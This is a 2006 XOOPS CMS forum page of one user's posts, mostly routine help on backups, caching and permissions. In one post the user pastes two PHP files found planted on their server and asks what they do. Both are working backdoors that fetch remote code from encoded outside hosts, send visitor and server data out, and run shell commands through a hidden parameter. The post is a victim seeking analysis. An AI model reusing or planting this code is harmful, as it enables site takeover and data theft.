xoops forums

Forum Index


Board index » All Posts (OldFriend)




OldFriend

Just popping in
Posted on: 2006/8/25 8:05
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#21

System Security.

I found the following php files uploaded to a directory on my site. They aren't part of XOOPS so I can only assume that a hacker has put them there.

Can anybody tell me what these files would have allowed the culprit to do?

The first one was called guest.php
<?php
error_reporting
(0);
if(isset(
$_POST["l"]) and isset($_POST["p"])){
    if(isset(
$_POST["input"])){$user_auth="&l="base64_encode($_POST["l"]) ."&p="base64_encode(md5($_POST["p"]));}
    else{
$user_auth="&l="$_POST["l"] ."&p="$_POST["p"];}
}else{
$user_auth="";}
if(!isset(
$_POST["log_flg"])){$log_flg="&log";}
if(! @include_once(
base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u"ip2long(getenv(REMOTE_ADDR))) ."&url="base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth $log_flg))
{
    if(isset(
$_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if(
$_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>


The second was called messages.php
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s"; if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);} ?>


OldFriend

Just popping in
Posted on: 2006/8/6 16:59
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#22

Re: Hacker Tracker?

Add NetQuery module as well as Protector.

Protector will tell you the IP address.
NetQuery will track the IP address.


OldFriend

Just popping in
Posted on: 2006/8/6 16:47
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#23

Re: What is your best module/method for backing up?

I find that the Protector module (everybody has this installed, right?) is good for backing up the database before making any major changes.

Admin->Modules->Protector->Prefix Manager

allows you to create a copy of all of your tables with a different Prefix.

Then make your changes, if you stuff somethin up then you can easily switch to use your DB copies.


OldFriend

Just popping in
Posted on: 2006/8/1 16:22
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#24

Re: Gdrive???

GDrive is the name of a service speculated to be offered by Google. The service is believed to be some form of unlimited online storage space (a concept similar to its current Gmail service which offers 2 gigabytes of scaled email storage space).

Discussion of the service began on March 3, 2006 when bloggers discovered a slide presentation on the Google website in which Google executives stated: "With infinite storage, we can house all user files, including emails, web history, pictures, bookmarks, etc and make it accessible from anywhere (any device, any platform, etc)". The presentation has since been taken down and been replaced by a 94-page Adobe Acrobat file, devoid of the speaker notes. Google has refused to confirm or deny the GDrive program claiming that the presentation was not intended for the public.

The discovery has, however, prompted media speculation surrounding a forthcoming service.

Retrieved from "http://en.wikipedia.org/wiki/GDrive"


OldFriend

Just popping in
Posted on: 2006/7/27 9:05
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#25

Re: System Security

Great, that looks easy enough.

Thank you.


OldFriend

Just popping in
Posted on: 2006/7/27 8:42
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#26

Re: Editing .php files, cache?

The module itself may be cached. You can turn that off in the admin section.


OldFriend

Just popping in
Posted on: 2006/7/26 10:31
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#27

Re: please help with this error code

Quote:
Shall I delete all the files, or just that one?


It wont hurt to delete all the .php files (and is probably good practice to do occassionally)

Quote:
What kind of files is it, temp files?


They are compiled template files.

The system will automatically re-compile a file if it is not found.


OldFriend

Just popping in
Posted on: 2006/7/26 10:14
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#28

System Security

Because these folders need to be set to writable, can someone please tell me the contents of .htaccess file to add to the templates_c and the cache folders to improve the security?


OldFriend

Just popping in
Posted on: 2006/7/20 18:31
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#29

Re: Migrating to Xoops

xcGallery RC 1.1
xcGallery is a gallery module for XOOPS 2.0.x based on coppermine photo gallery 1.1.0 by Gregory DEMAR.


OldFriend

Just popping in
Posted on: 2006/7/9 5:26
OldFriend
OldFriend (Show more)
Just popping in
Posts: 99
Since: 2005/10/28
#30

Re: Security concerns with Unix permissions

Quote:
I'd recommend you also look at using the Protector Module. One of the things included are instructions for moving the dB username/password out of mainfile and into a secure area.


I don't understand why these 2 features are not part of a minimum install.



TopTop
« 1 2 (3) 4 5 6 ... 10 »